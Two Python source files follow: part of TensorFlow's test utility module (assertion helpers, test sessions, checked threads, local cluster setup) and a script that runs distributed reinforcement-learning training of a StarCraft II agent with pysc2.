def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
    This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
      elif force_gpu and config.allow_soft_placement:
        # ConfigProto.CopyFrom() returns None, so copy into a fresh proto
        # explicitly instead of assigning its return value.
        copied_config = config_pb2.ConfigProto()
        copied_config.CopyFrom(config)
        config = copied_config
        config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
    Checks that |f1 - f2| <= err and asserts a test failure
    if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if that does not work,
      # traverse through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (path_str, type(a),
path_str, type(b))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray`, or any arbitrarily nested structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray`, or any arbitrarily nested structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2, "Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
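# Minimal usage sketch (hypothetical test class, not part of the original
# file): run_in_graph_and_eager_modes runs the body once under a graph
# session and once eagerly, and evaluate() works in both modes.
class _ExampleEvaluateTest(TensorFlowTestCase):
  @run_in_graph_and_eager_modes()
  def testOnesPlusOnes(self):
    total = array_ops.ones([2]) + array_ops.ones([2])
    self.assertAllEqual(self.evaluate(total), [2.0, 2.0])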
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
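# Lookup sketch (not part of the original file): parse a tiny GraphDef from a
# text proto and fetch one of its NodeDefs by name.
def _example_get_node_def_from_graph():
  gdef = graph_pb2.GraphDef()
  text_format.Merge('node { name: "x" op: "Placeholder" }', gdef)
  return get_node_def_from_graph("x", gdef)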
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
|
clone_two_eval_mini_srcgame_add_map_bn.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "6,7"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_add_map_bn as mini_source_agent
from mini_network_add_map_bn import MiniNetwork
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging  # calls to logging(...) below are logging.warning(...)
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
# 20200825-101942_mini
# 20200828-160609_source
flags.DEFINE_string("restore_model_path", "./model/20200901-213813_mini/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_string("restore_to", "source", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_bool("load_latest", False, "Load latest or bestest model, default is False")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 9770, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_bool("freeze_head", False, "Whether freeze_head train agents.")
flags.DEFINE_bool("use_bn", False, "Whether use batch_norm to training.")
flags.DEFINE_bool("use_sep_net", False, "Whether use seperate network for policy and value model.")
flags.DEFINE_integer("ob_space_add", 4, "Add state space from thought game.")
flags.DEFINE_integer("act_space_add", 5, "Add action space from thought game.")
flags.DEFINE_bool("add_image", False, "Whether add image for input.")
flags.DEFINE_bool("partial_restore", False, "Whether use partial_restore.")
flags.DEFINE_string("weighted_sum_type", "AddWeight", "add weighted sum type, AddWeight, AdaptiveWeight, AttentionWeight")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server or FLAGS.debug_mode:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 1
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
if USED_DEVICES == '-1':
DEVICE = ['/cpu:0']
else:
DEVICE = ['/gpu:' + str(dev) for dev in range(len(FLAGS.device.split(',')))]
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variable
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
'''
ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_add_map_bn | awk '{print $2}' `
'''
def run_thread(agent, game_num, Synchronizer, difficulty):
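    # Rollout/update protocol: each thread plays episodes and, every `game_num`
    # episodes, pauses rollouts (ROLLING_EVENT cleared). Threads with index != 0
    # register themselves via Waiting_Counter and the last of them sets
    # UPDATE_EVENT; the index-0 thread then syncs with the other processes on the
    # Barrier, updates the network, and releases everyone via ROLLING_EVENT.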
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
    C._FPS = 22.4 / FLAGS.step_mul  # 2.8 with the default step_mul of 8 (5.6 when step_mul is 4)
    step_mul = FLAGS.step_mul
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play_right_add(verbose=FLAGS.debug_mode)
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
                logging("(diff: %d) epoch %d: %s got %d/%d episodes, return: %d" %
                        (int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path, log_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None, ob_space_add=FLAGS.ob_space_add)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
    game_num = int(np.ceil(update_game_num / THREAD_NUM))  # round up so the threads together cover update_game_num episodes
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net,
restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore)
